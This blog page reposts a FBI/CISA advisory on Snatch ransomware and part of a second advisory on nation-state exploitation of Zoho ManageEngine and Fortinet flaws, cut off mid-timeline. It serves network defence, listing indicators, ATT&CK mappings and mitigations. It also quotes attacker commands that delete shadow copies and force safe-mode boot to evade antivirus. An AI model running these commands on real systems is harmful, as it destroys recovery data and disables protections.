Le blog Ankaa Pmo® | Ankaa Pmo®

#StopRansomware: Snatch Ransomware

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.

Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

AA23-263A.pdf (PDF, 578.71 KB )

For a downloadable copy of IOCs, see:

AA23-263A STIX XML (XML, 79.84 KB )

AA23-263A STIX JSON (JSON, 56.10 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.

Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]

Initial Access and Persistence

Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].

Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].

Data Discovery and Lateral Movement

Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].

Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].

Defense Evasion and Execution

During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].

The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.

Indicators of Compromise (IOCs)

The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.

Email Domains and Addresses

Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:

*Table 1: Malicious Email Domains Observed in Use by Snatch Threat Actors*
Email Domains
sezname[.]cz
cock[.]li
airmail[.]cc

Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.

*Table 2: Legitimate Email Domains Observed in Use by Snatch Threat Actors*
Email Domains
tutanota[.]com / tutamail[.]com / tuta[.]io
mail[.]fr
keemail[.]me
protonmail[.]com / proton[.]me
swisscows[.]email

The email addresses listed in Table 3 were reported by recent victims.

*Table 3: Snatch’s Email Addresses Reported by Recent Victims*
Email Addresses
sn.tchnews.top@protonmail[.]me
funny385@swisscows[.]email
funny385@proton[.]me
russellrspeck@seznam[.]cz
russellrspeck@protonmail[.]com
Mailz13MoraleS@proton[.]me
datasto100@tutanota[.]com
snatch.vip@protonmail[.]com

*TOX Messaging IDs*
TOX Messaging IDs
CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F
7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418
83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97
0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58 NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.

*Folder Creation*
Folder Creation
C:$SysReset

*Filenames with Associated SHA-256 Hashes*
Filenames	SHA-256
qesbdksdvnotrjnexutx.bat	0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
eqbglqcngblqnl.bat	1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
safe.exe	5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd
safe.exe	7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3
safe.exe	28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c
safe.exe	fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066
DefenderControl.exe	a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae
PRETTYOCEANApplicationdrs.bi	6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0
Setup.exe	510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1
WRSA.exe	ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d
ghnhfglwaplf.bat	2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57
nllraq.bat	251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d
ygariiwfenmqteiwcr.bat	3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924
bsfyqgqeauegwyfvtp.bat	6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7
rgibdcghzwpk.bat	84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5
pxyicmajjlqrtgcnhi.bat	a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84
evhgpp.bat	b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40
eqbglqcngblqnl.bat	1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
qesbdksdvnotrjnexutx.bat	0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
HOW TO RESTORE YOUR FILES.TXT

*Filenames with Associated SHA-1 Hashes*
Filenames	SHA-1
safe.exe	c8a0060290715f266c89a21480fed08133ea2614

*Commands Used by Snatch Threat Actors*
Commands
wmiadap.exe /F /T /R
%windir%System32svchost.eve –k WerSvcGroup
conhost.exe 0xFFFFFFFF -ForceV1
vssadmin delete shadows /all /quiet
bcdedit.exe /set {current} safeboot minimal
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalVSS /VE /T REG_SZ /F /D Service
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalmXoRpcSsx /VE /T REG_SZ /F /D Service
REG QUERY HKLMSYSTEMCurrentControlSetControl /v SystemStartOptions
%CONHOST% “1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320
“C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe” –flag-switches-begin –flag-switches-end –no-startup-window /prefetch:5
cmd /d /c cmd /d /c cmd /d /c start ” ” C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi.

*Registry Keys*
Registry Keys
HKLMSOFTWAREMicrosoftWindows Media Player NSS3.0ServersD8B548F0-E306-4B2B-BD82-25DAC3208786FriendlyName
HKUS-1-5-21-4270068108-2931534202-3907561125-1001SoftwareMicrosoftWindowsCurrentVersionShell ExtensionsCached{ED50FC29-B964- 48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF

*System Log Changes*
Source	Message
TerminalServices-RemoteConnectionManager	Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall	A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall	A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.
Microsoft-Windows-TaskScheduler%4Operational	Instance of process C:Windowssvchost.exe. (Incorrect file location, should be C:WindowsSystem32svchost.exe)

*Mutexes Created*
Mutexes Created
Sessions1BaseNamedObjectsgcc-shmem-tdm2-fc_key
Sessions1BaseNamedObjectsgcc-shmem-tdm2-sjlj_once
Sessions1BaseNamedObjectsgcc-shmem-tdm2-use_fc_key
gcc-shmem-tdm2-fc_key
gcc-hmem-tdm2-sjlj_once
gcc-shmem-tdm2-use_fc_key

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.

*Table 4: Snatch Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance*
Technique Title	ID	Use
Gather Victim Network Information	T1590	Snatch threat actors may gather information about the victim’s networks that can be used during targeting.

*Table 5: Snatch Threat Actors ATT&CK Techniques for Enterprise – Resource Development*
Technique Title	ID	Use
Acquire Infrastructure: Virtual Private Server	T1583.003	Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.

*Table 6: Snatch Threat Actors ATT&CK Techniques for Enterprise – Initial Access*
Technique Title	ID	Use
Valid Accounts	T1078	Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.
External Remote Services	T1133	Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network. Snatch threat actors use VPN services to connect to a victim’s network.

*Table 7: Snatch Threat Actors ATT&CK Techniques for Enterprise – Execution*
Technique Title	ID	Use
Command and Scripting Interpreter: Windows Command Shell	T1059.003	Snatch threat actors may use batch files (`.bat`) during ransomware execution and data discovery.
System Services: Service Execution	T1569.002	Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used `sc.exe`.

*Table 8: Snatch Threat Actors ATT&CK Techniques for Enterprise – Persistence*
Technique Title	ID	Use
Valid Accounts: Domain Accounts	T1078.002	Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network.

*Table 9: Snatch Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion*
Technique Title	ID	Use
Masquerading	T1036	Snatch threat actors have the ransomware executable match the `SHA-256` hash of a legitimate file to avoid rule-based detection.
Indicator Removal: File Deletion	T1070.004	Snatch threat actors delete batch files from a victim’s filesystem once execution is complete.
Modify Registry	T1112	Snatch threat actors modify Windows Registry keys to aid in persistence and execution.
Impair Defenses: Disable or Modify Tools	T1562.001	Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.
Impair Defenses: Safe Mode Boot	T1562.009	Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.

*Table 10: Snatch Threat Actors ATT&CK Techniques for Enterprise – Credential Access*
Technique Title	ID	Use
Brute Force: Password Guessing	T1110.001	Snatch threat actors use brute force to obtain administrator credentials for a victim’s network.

*Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery*
Technique Title	ID	Use
Query Registry	T1012	Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Process Discovery	T1057	Snatch threat actors search for information about running processes on a system.

*Table 12: Snatch Threat Actors ATT&CK Techniques for Enterprise – Lateral Movement*
Technique Title	ID	Use
Remote Services: Remote Desktop Protocol	T1021.001	Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.

*Table 13: Snatch Threat Actors ATT&CK Techniques for Enterprise – Collection*
Technique Title	ID	Use
Data from Local System	T1005	Snatch threat actors search systems to find files and folders of interest prior to exfiltration.

*Table 14: Snatch Threat Actors ATT&CK Techniques for Enterprise – Command and Control*
Technique Title	ID	Use
Application Layer Protocols: Web Protocols	T1071.001	Snatch threat actors establish connections over port `443` to blend C2 traffic in with other web traffic.

*Table 15: Snatch Threat Actors ATT&CK Techniques for Enterprise – Exfiltration*
Technique Title	ID	Use
Exfiltration	TA0010	Snatch threat actors use exfiltration techniques to steal data from a victim’s network.

*Table 16: Snatch Threat Actors ATT&CK Techniques for Enterprise – Impact*
Technique Title	ID	Use
Data Encrypted for Impact	T1486	Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
Inhibit System Recovery	T1490	Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.

MITIGATIONS

These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Reduce threat of malicious actors using remote access tools by:
- Auditing remote access tools on your network to identify currently used and/or authorized software.
- Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
- Using security software to detect instances of remote access software being loaded only in memory.
- Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
- Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
Implement application controls to manage and control execution of software, including allowlisting remote access programs.
- Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
- Audit the network for systems using RDP.
- Close unused RDP ports.
- Enforce account lockouts after a specified number of attempts.
- Apply phishing-resistant multifactor authentication (MFA).
- Log RDP login attempts.
Disable command-line and scripting activities and permissions [CPG 2.N].
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
Reduce the threat of credential compromise via the following:
- Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
- Refrain from storing plaintext credentials in scripts.
Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E].

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
- Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords [CPG 2.C].
- Implement multiple failed login attempt account lockouts [CPG 2.G].
- Disable password “hints.”
- Refrain from requiring password changes more frequently than once per year.
  Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Disable unused ports and protocols [CPG 2.V].
Consider adding an email banner to emails received from outside your organization [CPG 2.M].
Disable hyperlinks in received emails.
Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Tables 4-16).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.

REFERENCES

[1] DataBreaches.net

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.

VERSION HISTORY

September 20, 2023: Initial version.

Source de l’article sur us-cert.gov

18 September 2023/by Service comm.

Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

AA23-250A Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 686.29 KB )

For a downloadable copy of IOCs, see:

AA23-250A STIX XML (XML, 69.24 KB )

AA23-250A STIX JSON (JSON, 69.89 KB )

For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:

MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 (PDF, 385.49 KB )

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:

Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.
Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization’s firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.

APT Actor Activity

Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.

Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.

Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.

Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.

APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:

144.202.2[.]71
207.246.105[.]240
45.77.121[.]232
47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.

c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usresource.aspx
c:inetpubwwwrootuninetcssfont-awesomecssdiscover.ashx
c:inetpubwwwrootuninetcssfont-awesomecssconfiglogin.ashx
c:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15templatelayoutsapproveinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteerrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.ashx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userror.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo-1.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usnew_list.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-uslgnbotr.ashx
c:inetpubpasswordchangeLECPNJYRH.aspx
c:inetpubpasswordchange9ehj.aspx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservicesinfo.ashx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservices.aspx
c:inetpubredirectedSites[REDACTED]productsuns1fw.aspx
c:inetpubredirectedSites[REDACTED]productsuns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:

45.90.123[.]194
154.6.91[.]26
154.6.93[.]22
154.6.93[.]5
154.6.93[.]12
154.6.93[.]32
154.6.93[.]24
184.170.241[.]27
191.96.106[.]40
102.129.145[.]232

Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

*Table 1: Timeline of APT Actor Activity*
Timestamp (UTC)	Event	Description
2023-01-18 11:57:02	`Hello World` User-Agent string observed in 44 total events. Uniform Resource Identifier (URI): `/cgi-bin/downloadFlile[.]cgi`	`Hello World`, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP `92.118.39[.]82` [T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1]
2023-01-20	Attempts made to export three files; associated with malicious IP `192.142.226[.]153`.	APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with `.zip` and `.gif` extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files: `wo_view_bg.zip` (09:06:37 UTC) `wo_view_bg1.gif` (09:08:11 UTC) `wo_view_bg2.gif` (09:19:43 UTC) Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.
2023-01-20 16:51:05	Successful web server exploitation via CVE-2022-47966.	Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.
2023-01-21 06:46:42	`Azure` local user account with administrative permissions created.	A local user account with administrative permissions, named `Azure`, was created on the server hosting ServiceDesk Plus.
2023-01-21 06:49:40	LSASS dumped by `Azure` user.	The `Azure` user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001]. Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
